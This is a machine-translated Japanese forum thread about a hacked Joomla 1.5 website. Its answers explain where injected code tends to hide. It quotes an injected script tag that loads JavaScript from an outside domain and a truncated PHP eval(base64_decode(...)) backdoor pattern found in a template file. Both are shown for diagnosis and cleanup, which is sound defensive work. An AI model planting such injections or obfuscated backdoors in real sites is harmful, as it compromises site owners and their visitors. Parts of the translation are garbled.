2011-12-07 10 views
0

私のJoomla! (どこか)1.5のWebサイトは最近、XSS攻撃(それはこのようなものになると私はnoobのだ)であると思われるものの犠牲になった...次のコードは、サイト内に注入したJoomla! 1.5サイトがXSSの犠牲​​者になった

<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script> 

およびI」正確にはわからない。私はデータベースとファイルを検索して、結果がゼロになるように探しました。明白な何かがありますか?

+0

あなたはそのテキストのフォルダを具体的にgrepしましたか?私はインジェクションが実際にはエンコードされたテキスト(エンコードされていないURLを読むとき)を持つ新しいシートを作成するのを見ました - そして、それらは単純にエンコードされたテキストをunencodeしてそれをどんなページ/モジュールにも挿入するPHPのスニペットを含みますPHPコードはから実行されます。この場合、あなたは決して見ることができません: 「追跡する」ことが不可能になり、エラーログをチェックし、 NoScriptとFirebugを入手して、JSがロードされている場所とどこからJSが読み込まれているかを確認します。 – Hanny

+0

リンクがタグの後にある場合は、テンプレートのindex.phpファイル(またはperhapのJoomlaのメインindex.phpファイル)に直接編集されている可能性があります.JavaScriptをオフにするとHTMLが表示されませんjavascriptファイルは編集されています。通常、テンプレートの.jsファイルの最後に1行または2行を追加します。もう1つの可能性は、htmlが 'コンポーネント領域'内にある場合、 SQLインジェクションを介してデータベース内のすべての記事にhtmlを直接挿入しました.Joomla 1.5のバージョンは1.5です。 –

答えて

2

私のサイトもこの攻撃の犠牲になりましたが、まだ調査中です。 XSS攻撃ではないため、サーバーファイルが侵害されました。インデックスのphpファイルのシステムテンプレートの内側を見て、あなたはこのようなコードのブロックを見つける:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb.....> 

のbase64エンコード文字列は、嫌なことのすべての種類を行うPHPコードです。

関連する問題